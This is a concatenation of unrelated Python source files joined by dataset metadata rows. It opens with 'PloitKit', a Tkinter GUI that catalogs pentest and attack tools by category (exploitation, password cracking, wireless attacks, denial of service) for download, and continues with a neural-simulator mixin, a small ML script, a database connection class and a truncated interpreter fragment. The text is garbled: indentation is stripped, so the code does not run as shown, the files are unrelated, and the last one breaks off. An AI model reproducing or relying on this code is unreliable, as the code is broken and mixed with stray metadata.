from tkinter.ttk import ttk
import atexit
import os
import sys
from aboutme import aboutme
from contact import contact
from about import about
from licenses import licenses
from updates import checkupdates
from suggestions import suggestions
from contributors import contributions
from checktool import checktool
from mydownloads import mydownloads
from savedownloads import startdownload, savedownloads
from report import report
def hello():
print 'hello world'
def atgexit():
try:
os.remove('mydownloads.txt')
except:
pass
def mainbody():
root = Tk()
root.geometry("577x556+427+139")
root.title("PloitKit - The Hacker's Toolbox")
root.configure(background="#d9d9d9")
#root.wm_iconbitmap('images/icon.ico')
#root.resizable(0,0)
imagepath = r'images/header.gif'
image = PhotoImage(file=imagepath)
ilabel = Label(root, image = image)
ilabel.image = image
ilabel.pack()
varinfo = StringVar(root, value='Information Gathering')
varvuln = StringVar(root, value="Vulnerability Analysis")
varexploit = StringVar(root, value="Exploitation Tool")
varwireless = StringVar(root, value="Wireless Attacks")
varforensic = StringVar(root, value="Forensics Tools")
varwebapp = StringVar(root, value="Web Application")
varstress = StringVar(root, value="Stress Testing")
varsniff = StringVar(root, value="Sniffing & Spoofing")
varpass = StringVar(root, value="Password Attacks")
varhard = StringVar(root, value="Hardware Hacking")
varreverse = StringVar(root, value="Reverse Engineering")
varreport = StringVar(root, value="Reporting tools")
varall = StringVar(root, value="All tools")
infolist = 'acccheck','ace-voip','Amap','Automater','bing-ip2hosts','braa','CaseFile','CDPSnarf','cisco-torch','Cookie Cadger','copy-router-config','DMitry','dnmap','dnsenum','dnsmap','DNSRecon','dnstracer','dnswalk','DotDotPwn','enum4linux','enumIAX','Fierce','Firewalk','fragroute','fragrouter','Ghost Phisher','GoLismero','goofile','hping3','InTrace','iSMTP','lbd','Maltego Teeth','masscan','Metagoofil','Miranda','nbtscan-unixwiz','Nmap','ntop','p0f','Parsero','Recon-ng','SET','smtp-user-enum','snmp-check','sslcaudit','SSLsplit','sslstrip','SSLyze','THC-IPV6','theHarvester','TLSSLed','twofi','URLCrazy','Wireshark','WOL-E','Xplico'
vulnlist = 'BBQSQL','BED','BruteXSS','cisco-auditing-tool','cisco-global-exploiter','cisco-ocs','cisco-torch','copy-router-config','DBPwAudit','Doona','DotDotPwn','Greenbone Security Assistant','GSD','HexorBase','Inguma','jSQL','Lynis','Nmap','ohrwurm','openvas-administrator','openvas-cli','openvas-manager','openvas-scanner','Oscanner','Powerfuzzer','sfuzz','SidGuesser','SIPArmyKnife','sqlmap','Sqlninja','sqlsus','THC-IPV6','tnscmd10g','unix-privesc-check','Yersinia'
exploitlist = 'Armitage','Backdoor Factory','BeEF','cisco-auditing-tool','cisco-global-exploiter','cisco-ocs','cisco-torch','Commix','crackle','exploitdb','jboss-autopwn','Linux Exploit Suggester','Maltego Teeth','SET','ShellNoob','sqlmap','struts pwn','THC-IPV6','Yersinia'
wirelesslist = 'Aircrack-ng','Asleap','Bluelog','BlueMaho','Bluepot','BlueRanger','Bluesnarfer','Bully','coWPAtty','crackle','eapmd5pass','Fern Wifi Cracker','Ghost Phisher','GISKismet','Gqrx','gr-scan','hostapd-wpe','kalibrate-rtl','KillerBee','mdk3','mfcuk','mfoc','mfterm','Multimon-NG','PixieWPS','Reaver','redfang','RTLSDR Scanner','Spooftooph','Wifi Honey','wifiphisher','Wifitap','Wifite'
forensiclist = 'Binwalk','bulk-extractor','Capstone','chntpw','Cuckoo','dc3dd','ddrescue','DFF','diStorm3','Dumpzilla','extundelete','Foremost','Galleta','Guymager','iPhone Backup Analyzer','p0f','pdf-parser','pdfid','pdgmail','peepdf','RegRipper','Volatility','Xplico'
webapplist = 'apache-users','Arachni','BBQSQL','BlindElephant','Burp Suite','CutyCapt','DAVTest','deblaze','DIRB','DirBuster','fimap','FunkLoad','Gobuster','Grabber','jboss-autopwn','joomscan','jSQL','Maltego Teeth','PadBuster','Paros','Parsero','plecost','Powerfuzzer','ProxyStrike','Recon-ng','Skipfish','sqlmap','Sqlninja','sqlsus','ua-tester','Uniscan','Vega','w3af','WebScarab','Webshag','WebSlayer','WebSploit','Wfuzz','WPScan','XSSer','zaproxy'
stresslist = 'DHCPig','FunkLoad','iaxflood','Inundator','inviteflood','ipv6-toolkit','mdk3','Reaver','rtpflood','SlowHTTPTest','t50','Termineter','THC-IPV6','THC-SSL-DOS'
snifflist = 'Burp Suite','DNSChef','fiked','hamster-sidejack','HexInject','iaxflood','inviteflood','iSMTP','isr-evilgrade','mitmproxy','ohrwurm','protos-sip','rebind','responder','rtpbreak','rtpinsertsound','rtpmixsound','sctpscan','SIPArmyKnife','SIPp','SIPVicious','SniffJoke','SSLsplit','sslstrip','THC-IPV6','VoIPHopper','WebScarab','Wifi Honey','Wireshark','xspy','Yersinia','zaproxy'
passlist = 'acccheck','Burp Suite','CeWL','chntpw','cisco-auditing-tool','CmosPwd','creddump','crunch','DBPwAudit','findmyhash','gpp-decrypt','hash-identifier','HexorBase','THC-Hydra','John the Ripper','Johnny','keimpx','Maltego Teeth','Maskprocessor','multiforcer','Ncrack','oclgausscrack','PACK','patator','phrasendrescher','polenum','RainbowCrack','rcracki-mt','RSMangler','SQLdict','Statsprocessor','THC-pptp-bruter','TrueCrack','WebScarab','wordlists','zaproxy'
hardlist = 'android-sdk','apktool','Arduino','dex2jar','Sakis3G','smali'
reverselist = 'apktool','dex2jar','diStorm3','edb-debugger','jad','javasnoop','JD-GUI','OllyDbg','smali','Valgrind','YARA'
reportlist = 'CaseFile','CutyCapt','dos2unix','Dradis','KeepNote','MagicTree','Metagoofil','Nipper-ng','pipal'
alllist = 'BruteXSS','dos2unix','Dradis','KeepNote','MagicTree','Metagoofil','Nipper-ng','pipal','diStorm3','edb-debugger','jad','javasnoop','JD-GUI','OllyDbg','Valgrind','YARA','acccheck','ace-voip','Amap','Automater','bing-ip2hosts','braa','CaseFile','CDPSnarf','Cookie Cadger','copy-router-config','DMitry','dnmap','dnsenum','dnsmap','DNSRecon','dnstracer','dnswalk','enum4linux','enumIAX','Fierce','Firewalk','fragroute','fragrouter','GoLismero','goofile','hping3','InTrace','lbd','masscan','Miranda','nbtscan-unixwiz','ntop','smtp-user-enum','snmp-check','sslcaudit','struts pwn','SSLyze','theHarvester','TLSSLed','twofi','URLCrazy','WOL-E','BED','cisco-global-exploiter','cisco-ocs','Doona','DotDotPwn','Greenbone Security Assistant','GSD','Inguma','Lynis','Nmap','openvas-administrator','openvas-cli','openvas-manager','openvas-scanner','Oscanner','sfuzz','SidGuesser','Sqlninja','sqlsus','tnscmd10g','unix-privesc-check','Yersinia','Armitage','Backdoor Factory','BeEF','cisco-auditing-tool','cisco-torch','Commix','crackle','exploitdb','Linux Exploit Suggester','SET','ShellNoob','Aircrack-ng','Asleap','Bluelog','BlueMaho','Bluepot','BlueRanger','Bluesnarfer','Bully','coWPAtty','eapmd5pass','Fern Wifi Cracker','Ghost Phisher','GISKismet','Gqrx','gr-scan','hostapd-wpe','kalibrate-rtl','KillerBee','mdk3','mfcuk','mfoc','mfterm','Multimon-NG','PixieWPS','redfang','RTLSDR Scanner','Spooftooph','wifiphisher','Wifitap','Wifite','Binwalk','bulk-extractor','Capstone','Cuckoo','dc3dd','ddrescue','DFF','Dumpzilla','extundelete','Foremost','Galleta','Guymager','iPhone Backup Analyzer','p0f','pdf-parser','pdfid','pdgmail','peepdf','RegRipper','Volatility','Xplico','apache-users','Arachni','BBQSQL','BlindElephant','Burp Suite','CutyCapt','DAVTest','deblaze','DIRB','DirBuster','fimap','Gobuster','Grabber','jboss-autopwn','joomscan','jSQL','PadBuster','Paros','Parsero','plecost','Powerfuzzer','ProxyStrike','Recon-ng','Skipfish','sqlmap','ua-tester','Uniscan','Vega','w3af','Webshag','WebSlayer','WebSploit','Wfuzz','WPScan','XSSer','DHCPig','FunkLoad','iaxflood','Inundator','inviteflood','ipv6-toolkit','Reaver','rtpflood','SlowHTTPTest','t50','Termineter','THC-SSL-DOS','DNSChef','fiked','hamster-sidejack','HexInject','iSMTP','isr-evilgrade','mitmproxy','ohrwurm','protos-sip','rebind','responder','rtpbreak','rtpinsertsound','rtpmixsound','sctpscan','SIPArmyKnife','SIPp','SIPVicious','SniffJoke','SSLsplit','sslstrip','THC-IPV6','VoIPHopper','Wifi Honey','Wireshark','xspy','CeWL','chntpw','CmosPwd','creddump','crunch','DBPwAudit','findmyhash','gpp-decrypt','hash-identifier','HexorBase','THC-Hydra','John the Ripper','Johnny','keimpx','Maltego Teeth','Maskprocessor','multiforcer','Ncrack','oclgausscrack','PACK','patator','phrasendrescher','polenum','RainbowCrack','rcracki-mt','RSMangler','SQLdict','Statsprocessor','THC-pptp-bruter','TrueCrack','WebScarab','wordlists','zaproxy','android-sdk','apktool','Arduino','dex2jar','Sakis3G','smali'
alltools ='brutexss','dos2unix','dradis','keepnote','magictree','metagoofil','nipper-ng','pipal','distorm3','edb-debugger','jad','javasnoop','jd-gui','ollydbg','valgrind','yara','acccheck','ace-voip','amap','automater','bing-ip2hosts','braa','caseFile','cdpsnarf','cookie cadger','copy-router-config','dmitry','dnmap','dnsenum','dnsmap','dnsrecon','dnstracer','dnswalk','enum4linux','enumiax','fierce','firewalk','fragroute','fragrouter','golismero','goofile','hping3','intrace','lbd','masscan','miranda','nbtscan-unixwiz','ntop','smtp-user-enum','snmp-check','sslcaudit','struts pwn','sslyze','theharvester','tlssled','twofi','urlcrazy','wol-e','bed','cisco-global-exploiter','cisco-ocs','doona','dotdotpwn','greenbone security assistant','gsd','inguma','lynis','nmap','openvas-administrator','openvas-cli','openvas-manager','openvas-scanner','oscanner','sfuzz','sidguesser','sqlninja','sqlsus','tnscmd10g','unix-privesc-check','yersinia','armitage','backdoor factory','beef','cisco-auditing-tool','cisco-torch','commix','crackle','exploitdb','linux exploit suggester','set','shellnoob','aircrack-ng','asleap','bluelog','blueMaho','bluepot','blueranger','bluesnarfer','bully','cowpatty','eapmd5pass','fern wifi cracker','ghost phisher','giskismet','gqrx','gr-scan','hostapd-wpe','kalibrate-rtl','killerbee','mdk3','mfcuk','mfoc','mfterm','multimon-ng','pixiewps','redfang','rtlsdr scanner','spooftooph','wifiphisher','wifitap','wifite','binwalk','bulk-extractor','capstone','cuckoo','dc3dd','ddrescue','dff','dumpzilla','extundelete','foremost','galleta','guymager','iphone backup analyzer','p0f','pdf-parser','pdfid','pdgmail','peepdf','regripper','volatility','xplico','apache-users','arachni','bbqsql','blindelephant','burp suite','cutycapt','davtest','deblaze','dirb','dirbuster','fimap','gobuster','grabber','jboss-autopwn','joomscan','jsql','padbuster','paros','parsero','plecost','powerfuzzer','proxystrike','recon-ng','skipfish','sqlmap','ua-tester','uniscan','vega','w3af','webshag','webslayer','websploit','wfuzz','wpscan','xsser','dhcpig','funkload','iaxflood','Inundator','inviteflood','ipv6-toolkit','reaver','rtpflood','slowhttptest','t50','termineter','thc-ssl-dos','dnschef','fiked','hamster-sidejack','hexinject','ismtp','isr-evilgrade','mitmproxy','ohrwurm','protos-sip','rebind','responder','rtpbreak','rtpinsertsound','rtpmixsound','sctpscan','siparmyknife','sipp','sipvicious','sniffjoke','sslsplit','sslstrip','thc-ipv6','voiphopper','wifi honey','wireshark','xspy','cewl','chntpw','cmospwd','creddump','crunch','dbpwaudit','findmyhash','gpp-decrypt','hash-identifier','hexorbase','thc-hydra','john the ripper','johnny','keimpx','maltego teeth','maskprocessor','multiforcer','ncrack','oclgausscrack','pack','patator','phrasendrescher','polenum','rainbowcrack','rcracki-mt','rsmangler','sqldict','statsprocessor','thc-pptp-bruter','truecrack','webscarab','wordlists','zaproxy','android-sdk','apktool','arduino','dex2jar','sakis3g','smali'
def downloadsection():
def cbinfo_onEnter(event):
#It will get the values
cbinfovalue = format(cbinfo.get())
cbvulnvalue = format(cbvuln.get())
cbexploitvalue = format(cbexploit.get())
cbwirelessvalue = format(cbwireless.get())
cbforensicsvalue = format(cbforensics.get())
cbwebvalue = format(cbweb.get())
cbstressvalue = format(cbstress.get())
cbsniffvalue = format(cbsniff.get())
cbpassvalue = format(cbpass.get())
cbhardvalue = format(cbhard.get())
cbreversevalue = format(cbreverse.get())
cbreportvalue = format(cbreport.get())
cballvalue = format(cball.get())
result = cbreportvalue+"\n"+cbinfovalue+"\n"+cbvulnvalue+"\n"+cbexploitvalue+"\n"+cbwirelessvalue+"\n"+cbforensicsvalue+"\n"+cbwebvalue+"\n"+cbstressvalue+"\n"+cbsniffvalue+"\n"+cbsniffvalue+"\n"+cbpassvalue+"\n"+cbhardvalue+"\n"+cbreversevalue+"\n"+cbreportvalue+"\n"+cballvalue
#print result
checktool(result)
startdownload()
_bgcolor = '#d9d9d9' # X11 color: 'gray85'
_fgcolor = '#000000' # X11 color: 'black'
_compcolor = '#d9d9d9' # X11 color: 'gray85'
_ana1color = '#d9d9d9' # X11 color: 'gray85'
_ana2color = '#d9d9d9' # X11 color: 'gray85'
style = ttk.Style()
if sys.platform == "win32":
style.theme_use('winnative')
style.configure('.',background=_bgcolor)
style.configure('.',foreground=_fgcolor)
style.configure('.',font="TkDefaultFont")
style.map('.',background=
[('selected', _compcolor), ('active',_ana2color)])
#Information Gathering Drop Down
cbinfo = ttk.Combobox( width=70, textvariable=varinfo)
cbinfo.bind("<Return>", cbinfo_onEnter)
cbinfo.bind("<<ComboboxSelected>>", cbinfo_onEnter)
cbinfo['values']=(infolist)
cbinfo.place(relx=0.115, rely=0.18)
#Vulnerability Analysis Drop Down
cbvuln = ttk.Combobox( width=70, textvariable=varvuln)
cbvuln.bind("<Return>", cbinfo_onEnter)
cbvuln.bind("<<ComboboxSelected>>", cbinfo_onEnter)
cbvuln['values']=(vulnlist)
cbvuln.place(relx=0.115, rely=0.24)
#Exploitation Tool Drop Down
cbexploit = ttk.Combobox( width=70, textvariable=varexploit)
cbexploit.bind("<Return>", cbinfo_onEnter)
cbexploit.bind("<<ComboboxSelected>>", cbinfo_onEnter)
cbexploit['values']=(exploitlist)
cbexploit.place(relx=0.115, rely=0.30)
#Wireless Attacks Drop Down
cbwireless = ttk.Combobox( width=70, textvariable=varwireless)
cbwireless.bind("<Return>", cbinfo_onEnter)
cbwireless.bind("<<ComboboxSelected>>", cbinfo_onEnter)
cbwireless['values']=(wirelesslist)
cbwireless.place(relx=0.115, rely=0.36)
#Foresics tools Drop Down
cbforensics = ttk.Combobox( width=70, textvariable=varforensic)
cbforensics.bind("<Return>", cbinfo_onEnter)
cbforensics.bind("<<ComboboxSelected>>", cbinfo_onEnter)
cbforensics['values']=(forensiclist)
cbforensics.place(relx=0.115, rely=0.42)
#Web Application Drop Down
cbweb = ttk.Combobox( width=70, textvariable=varwebapp)
cbweb.bind("<Return>", cbinfo_onEnter)
cbweb.bind("<<ComboboxSelected>>", cbinfo_onEnter)
cbweb['values']=(webapplist)
cbweb.place(relx=0.115, rely=0.48)
#Stress Testing Drop Down
cbstress = ttk.Combobox( width=70, textvariable=varstress)
cbstress.bind("<Return>", cbinfo_onEnter)
cbstress.bind("<<ComboboxSelected>>", cbinfo_onEnter)
cbstress['values']=(stresslist)
cbstress.place(relx=0.115, rely=0.54)
#Sniffing & Spoofind Drop Down
cbsniff = ttk.Combobox( width=70, textvariable=varsniff)
cbsniff.bind("<Return>", cbinfo_onEnter)
cbsniff.bind("<<ComboboxSelected>>", cbinfo_onEnter)
cbsniff['values']=(snifflist)
cbsniff.place(relx=0.115, rely=0.60)
#Password Drop Down
cbpass = ttk.Combobox( width=70, textvariable=varpass)
cbpass.bind("<Return>", cbinfo_onEnter)
cbpass.bind("<<ComboboxSelected>>", cbinfo_onEnter)
cbpass['values']=(passlist)
cbpass.place(relx=0.115, rely=0.66)
#Hardware Hacking Drop Down
cbhard = ttk.Combobox( width=70, textvariable=varhard)
cbhard.bind("<Return>", cbinfo_onEnter)
cbhard.bind("<<ComboboxSelected>>", cbinfo_onEnter)
cbhard['values']=(hardlist)
cbhard.place(relx=0.115, rely=0.72)
#Reverse Engineering Drop Down
cbreverse = ttk.Combobox( width=70, textvariable=varreverse)
cbreverse.bind("<Return>", cbinfo_onEnter)
cbreverse.bind("<<ComboboxSelected>>", cbinfo_onEnter)
cbreverse['values']=(reverselist)
cbreverse.place(relx=0.115, rely=0.78)
#Reporting tools Drop Down
cbreport = ttk.Combobox( width=70, textvariable=varreport)
cbreport.bind("<Return>", cbinfo_onEnter)
cbreport.bind("<<ComboboxSelected>>", cbinfo_onEnter)
cbreport['values']=(reportlist)
cbreport.place(relx=0.115, rely=0.84)
#All tools Drop Down
cball = ttk.Combobox( width=70, textvariable=varall)
cball.bind("<Return>", cbinfo_onEnter)
cball.bind("<<ComboboxSelected>>", cbinfo_onEnter)
cball['values']=(alllist)
cball.place(relx=0.115, rely=0.90)
#A testing command
def test(text):
print 'In development phase.'+text
def mydownloadf():
mydownloads()
def reportf():
report()
def search():
search = Tk()
search.geometry("336x93+518+273")
search.title("Search")
search.configure(background="#d9d9d9")
search.wm_iconbitmap('images/icon.ico')
search.resizable(0,0)
SearchEntry = ttk.Entry(search)
SearchEntry.place(relx=0.12, rely=0.32, relheight=0.23, relwidth=0.55)
SearchEntry.configure(width=186)
SearchEntry.configure(takefocus="")
SearchEntry.configure(cursor="ibeam")
def tobesearch():
searchingtext = SearchEntry.get()
search.destroy()
def ok():
searching.destroy()
savedownloads(searchingtext)
startdownload()
def cancel():
searching.destroy()
def yes():
searching.destroy()
suggestions()
#print searchingtext
if searchingtext.lower() in alltools:
searching = Tk()
searching.geometry("322x155+456+155")
searching.title("Search")
searching.configure(background="#d9d9d9")
#searching.wm_iconbitmap('images/icon.ico')
searching.resizable(0,0)
Searching = ttk.Label(searching)
Searching.place(relx=0.33, rely=0.13, height=29, width=186)
Searching.configure(background="#d9d9d9")
Searching.configure(foreground="#000000")
Searching.configure(relief=FLAT)
Searching.configure(text='''Awesome! We found''')
Searching.configure(width=186)
Searching2 = ttk.Label(searching)
Searching2.place(relx=0.4, rely=0.32, height=19, width=186)
Searching2.configure(background="#d9d9d9")
Searching2.configure(foreground="#000000")
Searching2.configure(relief=FLAT)
Searching2.configure(text=searchingtext)
SearchingButtono = ttk.Button(searching, command=ok)
SearchingButtono.place(relx=0.12, rely=0.65, height=25, width=76)
SearchingButtono.configure(takefocus="")
SearchingButtono.configure(text='''Continue''')
SearchingButtonn = ttk.Button(searching, command=cancel)
SearchingButtonn.place(relx=0.59, rely=0.65, height=25, width=76)
SearchingButtonn.configure(takefocus="")
SearchingButtonn.configure(text='''Cancel''')
else:
searching = Tk()
searching.geometry("322x155+456+155")
searching.title("Oops! Can't found any tool")
searching.configure(background="#d9d9d9")
searching.wm_iconbitmap('images/icon.ico')
searching.resizable(0,0)
Searching = ttk.Label(searching)
Searching.place(relx=0.20, rely=0.13, height=29, width=186)
Searching.configure(background="#d9d9d9")
Searching.configure(foreground="#000000")
Searching.configure(relief=FLAT)
Searching.configure(text='''Wanna send us suggestion about''')
Searching.configure(width=186)
Searching2 = ttk.Label(searching)
Searching2.place(relx=0.4, rely=0.32, height=19, width=186)
Searching2.configure(background="#d9d9d9")
Searching2.configure(foreground="#000000")
Searching2.configure(relief=FLAT)
Searching2.configure(text=searchingtext)
SearchingButtono = ttk.Button(searching, command=yes)
SearchingButtono.place(relx=0.12, rely=0.65, height=25, width=76)
SearchingButtono.configure(takefocus="")
SearchingButtono.configure(text='''Yes''')
SearchingButtonn = ttk.Button(searching, command=cancel)
SearchingButtonn.place(relx=0.59, rely=0.65, height=25, width=76)
SearchingButtonn.configure(takefocus="")
SearchingButtonn.configure(text='''No''')
SearchButton = ttk.Button(search, command = tobesearch)
SearchButton.place(relx=0.71, rely=0.32, height=25, width=76)
SearchButton.configure(takefocus="")
SearchButton.configure(text='''Search''')
#Here is the top menubar
menubar = Menu(root)
homemenu = Menu(menubar, tearoff=0)
homemenu.add_command(label="Download Section", command=downloadsection)
homemenu.add_command(label="My Downloads", command=mydownloadf)
homemenu.add_separator()
homemenu.add_command(label="About me", command=aboutme)
homemenu.add_separator()
homemenu.add_command(label="Contact", command=contact)
menubar.add_cascade(label = "Home", menu=homemenu)
aboutmenu = Menu(menubar, tearoff=0)
aboutmenu.add_command(label="About this Tool", command=about)
aboutmenu.add_command(label="Licenses", command=licenses)
aboutmenu.add_separator()
aboutmenu.add_command(label="Check for Updates", command=checkupdates)
aboutmenu.add_separator()
aboutmenu.add_command(label="Contributors", command=contributions)
aboutmenu.add_command(label="Send me suggestions", command=suggestions)
aboutmenu.add_command(label="Report a tool", command=reportf)
menubar.add_cascade(label="About", menu=aboutmenu)
menubar.add_command(label="Search",command=search)
menubar.add_command(label = "Quit", command = sys.exit)
root.config(menu=menubar)
#Here menu bar ends.
#Here the programs starts
downloadsection()
root.mainloop()
atexit.register(atgexit)
if __name__ == '__main__':
mainbody()
| 62.377005 | 2,964 | 0.666981 | 2,442 | 23,329 | 6.342752 | 0.251433 | 0.022661 | 0.014849 | 0.015108 | 0.560462 | 0.524695 | 0.492672 | 0.475111 | 0.467106 | 0.455743 | 0 | 0.022638 | 0.147927 | 23,329 | 373 | 2,965 | 62.544236 | 0.756565 | 0.029534 | 0 | 0.192171 | 0 | 0 | 0.372916 | 0.006678 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.046263 | 0.074733 | null | null | 0.007117 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
78c7cc1b387aaacf7ab648fd90ba9d05363d47d7 | 3,573 | py | Python | pyrosim/_network.py | jbongard/SAIL_ON | b8418acb14d4c21d2e26d80c1bd159c7f7b47dc7 | [
"MIT"
] | 21 | 2019-01-31T13:08:52.000Z | 2021-04-16T07:28:50.000Z | pyrosim/_network.py | n0lley/polycube | bc97b81b7455a8682fcd83f198fad437bb3dc4cb | [
"MIT"
] | 1 | 2019-02-26T14:38:20.000Z | 2019-02-26T14:38:20.000Z | pyrosim/_network.py | n0lley/polycube | bc97b81b7455a8682fcd83f198fad437bb3dc4cb | [
"MIT"
] | 8 | 2019-02-26T14:29:07.000Z | 2020-09-03T05:15:48.000Z | class Mixin(object):
def _send_neuron(self, *args):
return self._send_entity('Neuron', *args)
def _send_synapse(self, *args):
return self._send_entity('Synapse', *args)
def send_synapse(self, source_neuron_id, target_neuron_id, weight):
"""Send a synapse to the simulator to connect neurons
Parameters
----------
source_neuron_id : int
The id tag of the source neuron
target_neuron_id : int
The id tag of the target neuron
weight : float
The weight value of the synapse
Returns
-------
int
The id tag of the synapse
"""
self._assert_neuron(source_neuron_id, 'source_neuron_id')
self._assert_neuron(target_neuron_id, 'target_neuron_id')
return self._send_synapse('Synapse',
source_neuron_id,
target_neuron_id,
weight)
def send_bias_neuron(self, value=1.0):
"""Send a bias neuron to the simulator"""
return self._send_neuron('BiasNeuron', value)
def send_sensor_neuron(self, sensor_id):
"""Send a sensor neuron to the simulator
Parameters
----------
sensor_id : int
The id tag of the sensor to pull values from at each time step.
Returns
-------
int
The id tag of the neuron
"""
self._assert_sensor(sensor_id, 'sensor_id')
return self._send_neuron('SensorNeuron', sensor_id)
def send_motor_neuron(self, motor_id, alpha=0.0, tau=1.0, starting_value=0.0):
"""Send a motor neuron to the simulator
The value of the motor neuron at each time step is passed to the specified
motor in order to determine how it should actuate.
Parameters
----------
motor_id : float
The id tag of the motor to send neuron value to
alpa : float (optional)
A 'learning rate' parameter. (default is 0)
tau : float (optional)
A 'learning rate' parameter. (default is 1.0)
starting_value : float (optional)
The starting value the neuron takes. Could be usefully when motor does
not start at 0. (default is 0)
Returns
-------
int
The id tag of the neuron
"""
self._assert_actuator(motor_id, 'motor_id')
return self._send_neuron('MotorNeuron', motor_id, alpha, tau, starting_value)
def send_user_neuron(self, input_values):
"""Send a user input neuron to the simulator.
A user input neuron takes pre-specified input supplied by the user before
simulation. Similar to a bias neuron that changes every time step. This is
useful to send Central Pattern Generators and other functions.
Parameters
----------
input_values : list
The values which the neuron will take every time step. If evaluation
time is longer than the length of the list, the values will be repeated
Returns
-------
int
The id tag of the neuron.
"""
return self._send_neuron('UserNeuron', len(input_values), input_values)
def send_hidden_neuron(self, alpha=1.0, tau=1.0,
starting_value=0.0):
"""Send a hidden neuron to the simulator"""
return self._send_neuron('HiddenNeuron',
alpha, tau, starting_value) | 34.028571 | 85 | 0.585782 | 451 | 3,573 | 4.467849 | 0.232816 | 0.027295 | 0.055583 | 0.039702 | 0.327047 | 0.26799 | 0.240199 | 0.186104 | 0.064516 | 0.064516 | 0 | 0.007987 | 0.334173 | 3,573 | 105 | 86 | 34.028571 | 0.839008 | 0.468794 | 0 | 0 | 0 | 0 | 0.086111 | 0 | 0 | 0 | 0 | 0 | 0.153846 | 1 | 0.307692 | false | 0 | 0 | 0.076923 | 0.653846 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
78cf640baa9c6f060f3bff8b3bbc561d2c418650 | 116 | py | Python | src/linear3.py | AstraZeneca-NGS/LogMl | cf254b358150f0f96a9dd2ea50de56acdc15bd56 | [
"MIT"
] | null | null | null | src/linear3.py | AstraZeneca-NGS/LogMl | cf254b358150f0f96a9dd2ea50de56acdc15bd56 | [
"MIT"
] | 56 | 2019-09-10T19:00:38.000Z | 2022-02-10T00:35:57.000Z | src/linear3.py | AstraZeneca-NGS/LogMl | cf254b358150f0f96a9dd2ea50de56acdc15bd56 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# Example of using 'linear 3' dataset
from logml import *
ml = LogMl()
ml()
print("Done!")
| 11.6 | 37 | 0.655172 | 18 | 116 | 4.222222 | 0.888889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010526 | 0.181034 | 116 | 9 | 38 | 12.888889 | 0.789474 | 0.482759 | 0 | 0 | 0 | 0 | 0.086207 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 0.25 | 0.25 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
154575f63d4890cc47224820e8d530eaea3c12e7 | 433 | py | Python | exasol_udf_mock_python/connection.py | LennartAtExasol/udf-mock-python | ce59699967ac90098bd811e82ce2a7f359da172a | [
"MIT"
] | null | null | null | exasol_udf_mock_python/connection.py | LennartAtExasol/udf-mock-python | ce59699967ac90098bd811e82ce2a7f359da172a | [
"MIT"
] | 15 | 2020-10-15T10:12:34.000Z | 2022-03-15T18:33:18.000Z | exasol_udf_mock_python/connection.py | LennartAtExasol/udf-mock-python | ce59699967ac90098bd811e82ce2a7f359da172a | [
"MIT"
] | 1 | 2021-03-23T10:11:17.000Z | 2021-03-23T10:11:17.000Z | from enum import Enum
class ConnectionType(Enum):
PASSWORD = 1
class Connection:
def __init__(self, address: str, user: str = None, password: str = None,
type: ConnectionType = ConnectionType.PASSWORD):
self.type = type
self.password = password
self.user = user
self.address = address
def __repr__(self):
return str(self.__class__) + ": " + str(self.__dict__) | 25.470588 | 76 | 0.623557 | 48 | 433 | 5.291667 | 0.395833 | 0.086614 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003205 | 0.279446 | 433 | 17 | 77 | 25.470588 | 0.810897 | 0 | 0 | 0 | 0 | 0 | 0.004608 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0.333333 | 0.083333 | 0.083333 | 0.583333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 2 |
1548c25bee743a1ae4ca02d311fc4e132e3b4f3f | 1,289 | py | Python | restart/Statement_yjcL/PrintSomething.py | yujiecong/yjcL | 6d6dc4ad3611cb34c07192a1a3038a1ac3f67d6c | [
"MIT"
] | null | null | null | restart/Statement_yjcL/PrintSomething.py | yujiecong/yjcL | 6d6dc4ad3611cb34c07192a1a3038a1ac3f67d6c | [
"MIT"
] | null | null | null | restart/Statement_yjcL/PrintSomething.py | yujiecong/yjcL | 6d6dc4ad3611cb34c07192a1a3038a1ac3f67d6c | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: UTF-8 -*-
'''
@IDE :PyCharm
@Project :yjcL
@USER :yanyin
@File :PrintSomething.py
@Author :yujiecong
@Date :2021/8/31 15:58
'''
import pprint
from restart.Enum.Enum import StatementType, TokenType, ExpressionType
import restart.Global.Variable
from restart.ExpressionyjcL.BinaryOperation import BinaryOperation_yjcL
from restart.Statement_yjcL.Statement_yjcL import Statement_yjcL
from restart.TokenyjcL.Identifier import Identifier_yjcL
from restart.TokenyjcL.Number import Number_yjcL
from restart.TokenyjcL.String import String_yjcL
from restart.TokenyjcL.Token import Token_yjcL
class PrintSomething_yjcL(Statement_yjcL):
def __init__(self,value):
super(PrintSomething_yjcL, self).__init__()
self.raw=value
self.type_=StatementType.PrintSomething
def resolve(self):
printWhat = self.raw["value"] #打印的内容
printType = printWhat["type"] #打印的字符
self.printKey=self.raw["print_key"]
